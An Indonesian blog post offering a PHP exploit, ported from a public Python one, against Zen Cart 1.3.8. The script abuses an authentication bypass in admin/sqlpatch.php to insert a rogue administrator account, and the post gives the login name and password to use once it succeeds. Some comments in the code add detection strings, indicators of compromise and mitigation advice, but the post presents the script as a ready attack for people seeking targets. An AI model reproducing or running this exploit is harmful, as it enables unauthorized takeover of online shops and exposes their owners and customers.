Lama nggak update blog...
Akhir-akhir ini banyak anak-anak yang cari-cari target Zen Cart.
Iseng aku coba ubah zen.py yang berbasis Python di milw0rm ke PHP.
Jalankan script PHP di bawah ini; kalau hasilnya done,
coba login adminnya dengan
username : adminsys
password : wew
ini scriptsnya:
http://noscan.xp3.biz/zen.txt
#!/usr/bin/php
// Usage guard: the script expects the target base URL as its first
// command-line argument. Without one it prints the banner below and stops
// with exit status 1.
if (!($argc >= 2)) {
    $usage = "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================
";
    echo $usage;
    exit(1);
}
/**
 * Fetch $url with cURL and hand back the response body.
 *
 * The request is a GET unless $post is given (loosely != null), in which case
 * it becomes a POST carrying $post as the body. No cookies or credentials are
 * attached.
 *
 * Both TLS checks (peer certificate and host name) are switched off, so the
 * remote end is never authenticated. CURLOPT_TIMEOUT is 0, i.e. no overall
 * time limit on the transfer.
 *
 * NOTE(review): the User-Agent is read from $_SERVER['HTTP_USER_AGENT'];
 * when run from the command line that key is normally not set, so the
 * header value is likely empty. Confirm before relying on a User-Agent
 * string when matching this traffic in logs.
 *
 * @param string      $url  Full URL to request.
 * @param string|null $post Raw POST body, or null for a plain GET.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function gets($url,$post=null) {
    $handle = curl_init();

    $options = array(
        CURLOPT_URL            => $url,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => $_SERVER['HTTP_USER_AGENT'],
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT        => 0,
    );

    // Only switch to POST when a body was supplied.
    if ($post != null) {
        $options[CURLOPT_POST] = true;
        $options[CURLOPT_POSTFIELDS] = $post;
    }

    // Apply the options one by one, in the order listed above.
    foreach ($options as $option => $value) {
        curl_setopt($handle, $option, $value);
    }

    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
// Target base URL, taken unmodified from the first command-line argument.
$url = $argv[1];
// Statement the script asks the target to run: it adds one row to the `admin`
// table (admin_id 56, admin_name 'adminsys', admin_email 'admin@irvian.info').
// Defender note: these literals double as indicators of compromise. An
// unexpected row in a store's admin table matching any of them means the
// request below was accepted; treat the installation as compromised (remove
// the row, rotate admin credentials, review what that account did).
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
// URL-encode the statement so it can travel as a single form field value.
$enc = urlencode($sql);
// Request path: admin/sqlpatch.php with "/password_forgotten.php" appended as
// extra path info, plus action=execute in the query string.
// NOTE(review): presumably the admin login gate in Zen Cart 1.3.8 decides by
// request path and lets the password-reset page through without a session,
// so the appended segment makes sqlpatch.php reachable unauthenticated.
// Confirm against the vendor advisory.
// Detection: POST requests whose URI contains
// "sqlpatch.php/password_forgotten.php" in the web server access log.
// Mitigation: move off 1.3.8 / apply the vendor fix, and restrict the admin
// directory at the web server (IP allow-list or HTTP authentication).
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
// Send the statement in the `query_string` POST field. gets() attaches no
// cookies or credentials, so this is an unauthenticated request.
$req = gets($form,"query_string=$enc");
// Success is judged solely by this phrase appearing (case-insensitively) in
// the response body; nothing else about the response is checked.
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}